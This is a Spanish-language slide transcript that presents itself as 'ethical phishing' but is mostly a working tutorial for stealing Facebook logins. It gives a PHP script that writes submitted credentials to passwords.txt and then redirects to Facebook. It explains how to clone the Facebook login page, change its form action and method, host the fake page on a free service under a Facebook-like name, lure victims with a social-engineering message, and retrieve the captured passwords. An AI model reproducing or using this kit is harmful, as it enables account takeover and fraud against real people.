Como hackear facebook mediante phishing ético (1)
-
Upload
miguel-angel-guevara-reyes -
Category
Food
-
view
68 -
download
3
Transcript of Como hackear facebook mediante phishing ético (1)
¿que es el phishing?
Suplantación de identidad. El termino Phishing es utilizado para referirse a uno de los métodos mas utilizados por delincuentes cibernéticos para estafar y obtener información confidencial de forma fraudulenta como puede ser una contraseña o información detallada sobre tarjetas de crédito u otra
información bancaria de la victima. El estafador, conocido como phisher, se vale de técnicas de ingeniería social, haciéndose pasar por una persona o empresa de confianza en una aparente comunicación oficial electrónica, por lo general un correo electrónico, o algún sistema de mensajería instantánea, redes sociales SMS/MMS, a raíz de un malware o incluso utilizando también llamadas telefónicas. https://www.infospyware.com/articulos/q ... l-phishing toda la información de que es el phishing y como protegerse
¿como hackear facebook mediante phishing?
PASO 1: Crear archivo Phishing.php (block de notas ) 1. Incluso si usted no tiene ningún conocimiento de archivo PHP simplemente copia el siguiente script y lo guardara como phishing.php
?
1 2
3 4 5
6 7
8 9 10
:<?php header("Location: <!-- m --><a class="postlink" href="https://www.facebook.com/login.php" onclick="window.open(this.href);return false;" data-original-title=""
title="">https://www.facebook.com/login.php</a><!-- m -->"); $handle = fopen("passwords.txt", "a"); foreach($_GET as $variable => $value) {fwrite($handle, $variable);fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n");} fwrite($handle, "\r\n"); fclose($handle); exit; ?>
PASO 2 : Creación de página index.html :
1. Abra la página de inicio de sesión de Facebook a continuación , haga clic derecho > Ver
código fuente de página y pegarlo en el bloc de notas y guardarlo como
index.html
2. Abra el archivo index.html que con un bloc de notas y búsqueda ( pulsando Ctrl + F ) para:
acción en él y sustituir la parte resaltada ( como en la siguiente captura de pantalla) con
phishing.php
[[
3. Búsqueda ( pulsa Ctrl + F ) para: método en ella y reemplace la parte resaltada (post ) con
get
4. pon guardar como index.html y hace click donde dice codificación UTF-8
OJO SI LO GUARDAS SIN LA CODIFICACIÓN UTF-8 QUEDARA LA PAGINA CON FALTA
DE AUTOGRAFIA Y CON SIGNOS DE PREGUNTA EN TODAS PARTES SI QUE POR ESO
GUARDARLO CON CODIFICACIÓN UTF-8
PASO 3 : Ahora crea un archivo de texto completamente en blanco con el nombre
passwords.txt
Ahora usted tiene todas las siguientes tres archivos con usted:
1. phishing.php
2. index.html
3. passwords.txt
Paso 4 : Ahora tiene que hacer un sitio web
Le recomendé que http://miarroba.es/ porque es completamente gratuito de alojamiento con
dominio gratis .
Ir a : http://miarroba.es/ y haga click en donde dice Regístrate y completa lo siguiente como la
captura de pantalla
2. Ahora vea su cuenta de correo electrónico que usted dio y confirme su cuenta con el enlace
de confirmación .
3. subir los archivos (index.html) (passwords.txt) (phishing.php) ya que esten adentro de su
cuenta miarroba van donde dice hosting si no lo encuentran entren
en http://hosting.miarroba.es luego van donde dice nuevo espacio dan click saldrá algo así
llenan los datos les recomiendo que en Dirección de la página web: pongan algo relacionado
con facebook como facebooksoporte o como quieran solo es para hacerlo un poco mas
creible
ahora si a subir los archivos (index.html) (passwords.txt) (phishing.php)
van donde dice 1 espacio alado de nuevo espacio dan click y saldrá el nombre que pusieron
en Título de la página web bueno le dan en administrar y saldrá algo muy parecido a esto van
donde dice webFTP
ay dos carpetas hacen click donde dice web abren la carpeta estará sin archivos
buno hacen click donde dice subir y marcan el archivo (index.html) ya que se aya subido el
index suben el archivo (passwords.txt) y luego el archivo (phishing.php) bueno quedaría algo
así
AHORA DAN CLICK DONDE DICE INDEX.HTML Y LOS LLEVARA A UNA PAGINA IGUAL A
FACEBOOK QUE PARECE LEGITIMA Y LISTO ENVÍAN EL LINK DICIENDO NOSE UN
EJEMPLO ME PUEDES AYUDAR CON MI PAGINA DALE ME GUSTA POR FAVOR
(ingeniería social)
la pagina falsa
AHORA CUANDO LA VICTIMA YA PUSO SU DATOS COMO CORREO ELECTRONICO
CONTRASEÑA YA QUE PUSO INICIAR RECIÉN SE VA ALA PAGINA ORINAL DE
¿ahora como reviso el correo y la clave que ingreso la victima?
muy fácil ay dos opciones de revisarlas
1. poniendo despues de el url passwords.txt como esta captura
2. abren miarroba van donde dice a su hosting creado van donde dice webFTP abren la
carpeta web marcan la casilla donde dice passwords.txt hacen click donde dice accion y hacen
click donde dice editar